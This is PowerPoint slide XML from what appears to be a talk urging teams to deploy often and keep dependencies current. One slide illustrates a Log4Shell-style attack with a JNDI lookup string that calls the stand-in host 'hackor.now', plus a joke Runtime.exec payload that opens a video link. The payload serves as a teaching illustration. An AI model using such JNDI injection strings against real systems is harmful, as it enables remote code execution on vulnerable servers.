                  <a:lnTo>
                    <a:pt x="1898" y="3869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2166" y="3431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2434" y="3017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2604" y="2823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2774" y="2628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3115" y="2336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3431" y="2068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3772" y="1825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4137" y="1582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4502" y="1387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4867" y="1192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5256" y="1046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5670" y="900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6083" y="803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6497" y="706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6935" y="633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7373" y="584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7811" y="535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8249" y="511"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="8444" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7641" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6838" y="122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6351" y="195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5889" y="292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5426" y="414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4964" y="560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4502" y="730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4088" y="949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3674" y="1217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3285" y="1509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2823" y="1922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2385" y="2312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2166" y="2531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1947" y="2725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1752" y="2969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1582" y="3212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1266" y="3723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="974" y="4283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="682" y="4842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438" y="5402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341" y="5645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268" y="5889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195" y="6132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146" y="6375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122" y="6886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122" y="7397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171" y="7908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268" y="8419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390" y="8906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536" y="9392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="682" y="9830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="876" y="10244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1095" y="10658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1339" y="11047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1631" y="11412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1947" y="11728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2117" y="11874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2312" y="12020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2507" y="12142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2701" y="12239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2677" y="12458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2604" y="12653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2482" y="12848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2361" y="13042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2215" y="13213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2069" y="13359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1752" y="13675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1412" y="13967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047" y="14259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828" y="14381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="633" y="14478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414" y="14575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195" y="14648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="14697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="14794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="14891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="14989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49" y="15086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146" y="15159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244" y="15208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365" y="15208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414" y="15183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560" y="15256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="682" y="15305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="998" y="15378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1314" y="15402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1679" y="15402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2020" y="15354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2336" y="15305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2896" y="15183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3261" y="15062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3626" y="14916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3991" y="14770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4331" y="14575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4575" y="14429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4818" y="14259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5037" y="14040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5134" y="13918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5207" y="13797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5426" y="13821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5645" y="13845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6059" y="13967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6497" y="14113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6692" y="14186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6911" y="14235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7178" y="14283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7446" y="14308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7981" y="14332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8517" y="14308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9052" y="14259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9490" y="14210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9952" y="14137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10390" y="14040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10828" y="13918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11266" y="13797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11680" y="13651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12093" y="13480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12507" y="13286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12921" y="13067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13310" y="12823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13699" y="12556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14089" y="12264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14429" y="11947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14770" y="11607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15111" y="11266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15403" y="10901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15670" y="10512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15914" y="10098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16133" y="9684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16327" y="9246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16473" y="8808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16595" y="8346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16668" y="7884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16717" y="7421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16717" y="7178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16692" y="6959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16595" y="6497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16473" y="6035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16352" y="5597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16206" y="5134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16084" y="4672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15962" y="4210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15792" y="3772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15597" y="3358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15354" y="2993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15062" y="2652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14770" y="2336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14429" y="2044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14089" y="1776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13724" y="1509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13334" y="1265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12969" y="1046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12580" y="827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12166" y="633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11777" y="487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11363" y="341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10950" y="219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10512" y="146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10074" y="73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B2D4DD-A188-F62E-AC7B-306782C5376D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2391320" y="3093640"/>
              <a:ext cx="710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54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Minimize Work in Progress</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> (WIP)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we can always deploy if needed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3A2C1-8496-A963-F61F-1AA8D26AB633}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354627" y="398231"/>
            <a:ext cx="17475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1.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79354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88139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3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1904057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367527" y="354571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1165387" y="1125536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669338" y="1352642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1157406" y="106252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E6EC6A3F-642B-D32C-6D39-5129A758B7A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496110" y="1761114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n-US" sz="4800" b="1" dirty="0"/>
              <a:t>Why?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715EFC3-40CB-FBBE-74C6-09FA181B5DDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="190832" y="3419871"/>
            <a:ext cx="8746434" cy="7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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>ome </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>echnically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>elevant  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>biquitous </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>ooling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>olution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;63;p13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71A2E741-5FD9-C63D-AF93-2121E7B1391D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="190832" y="3986152"/>
            <a:ext cx="8746434" cy="7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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>T.R.U.T.S.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6361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273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835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29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>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4D8C283-C9F6-4800-3323-35052D9F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351" y="2612550"/>
            <a:ext cx="5642654" cy="12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54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server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Been in production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Upgrade every week, just got a new feature</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Google Shape;603;p46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D27B21A0-3AF6-9F8C-A403-822374AC82F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7404100" y="280239"/>
            <a:ext cx="1400142" cy="132424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4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22CFC4D-1538-AD83-5477-61DC9B73B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351" y="2612550"/>
            <a:ext cx="5642654" cy="12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6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397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Depending on </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>previous version </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>anything</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> technical debt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can’t upgrade if you can’t upgrade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2.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935944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</a:t>
            </a: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seemlessly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Upgraded all the dependencies </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1988234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4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4202" y="3716735"/>
            <a:ext cx="2186867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Last Deployed 13 months ago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139AEE-493B-F604-5C03-D94E16866013}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1339948">
            <a:off x="503785" y="3849206"/>
            <a:ext cx="2186867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Being rewritten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8057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27200" y="1396192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335877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3651624" y="155755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3207378" y="150921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467558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4968434" y="1557556"/>
            <a:ext cx="1063812" cy="448235"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTermina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6681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B66AF7-97C2-81AB-93E4-8F2D486E0C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C1299-56F8-8923-D923-F3AA7C7043B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1986197" y="1499016"/>
            <a:ext cx="5250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Everyone's gone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server is bespoke</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code is obfuscated </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3891337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BF87D-EBFC-439F-6EF7-162BD996F7E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827398" y="1797139"/>
            <a:ext cx="56285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jndi:ldap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://hackor.now:1389/123}"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1" name="Google Shape;603;p46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62D9D7C7-25C7-C3E5-35B1-3AD41C25ED01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5480223" y="2403389"/>
            <a:ext cx="3194220" cy="202650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3237471" y="2336606"/>
            <a:ext cx="718598" cy="64755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AFA3B-19BA-657E-5D46-6C30B5972A74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4059195" y="2489886"/>
            <a:ext cx="1436714" cy="28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037161" y="2926682"/>
            <a:ext cx="10679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2B15F-1189-2C10-8C30-C10911796178}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6649201" y="4382864"/>
            <a:ext cx="10021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CE9178"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hackor.now</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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EF777-4E1E-41D8-DEAF-7B3314B09F89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4059195" y="2806609"/>
            <a:ext cx="1421028" cy="27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35CAC82-1887-468F-F5D0-9B55E38BAA17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5936245" y="2839588"/>
            <a:ext cx="25343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Process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Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>p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=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Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Runtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700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getRuntime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().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exec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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new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String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[]{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"open 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,    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"https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:latin typeface="Andale Mono" panose="020B0509000000000004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>youtu.be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/dQw4w9WgXcQ"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657FA-93C9-2969-2976-622287459BBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4483894" y="2370253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Wide Latin" panose="020A0A07050505020404" pitchFamily="18" charset="7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2980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9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757227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 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692609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627991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563373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498755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34137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Upgraded all the dependencies  </a:t>
            </a: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87638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839394" y="3495750"/>
            <a:ext cx="101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Blocked all outgoing calls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135814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397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have to be able to re-deploy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 you are dead in the water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3.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2577378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server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Been in production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Upgrade every week, just got a new feature</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Google Shape;603;p46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D27B21A0-3AF6-9F8C-A403-822374AC82F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7404100" y="280239"/>
            <a:ext cx="1400142" cy="132424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56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670050" y="4305300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03396648-72E4-3681-C287-A4D1AD273B40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$133</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="293051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D54468-2684-6114-A328-EE818FD1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03" y="763324"/>
            <a:ext cx="8577867" cy="368940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98783" y="1230335"/>
            <a:ext cx="8857752" cy="1715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b="1" dirty="0"/>
              <a:t>longer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> it’s been since you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>deployed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larger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>liability </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to your company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the world changes underneath you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924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4.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079584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1940118" y="1881788"/>
            <a:ext cx="5263764" cy="13800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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0"/>
              <a:t>hat should I do?</a:t>
            </a:r>
            <a:endParaRPr sz="24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RE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000" b="1" dirty="0">
                <a:latin typeface="Raleway"/>
                <a:ea typeface="Raleway"/>
                <a:cs typeface="Raleway"/>
                <a:sym typeface="Raleway"/>
              </a:rPr>
              <a:t>DEPLOY EVERY MONTH</a:t>
            </a:r>
            <a:endParaRPr b="1"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45271" y="2109944"/>
            <a:ext cx="7822531" cy="3382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000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>How old are your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000" dirty="0"/>
              <a:t>servers?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>How old are your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200" dirty="0"/>
              <a:t>dependencies?</a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0"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9161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233298" y="854671"/>
            <a:ext cx="3921428" cy="3077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sz="1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519A4F-2D81-E459-5812-189845B1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4726" y="193762"/>
            <a:ext cx="4755976" cy="4755976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Google Shape;267;p33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75ED1271-44EF-8411-CF55-25A3B35AAD36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
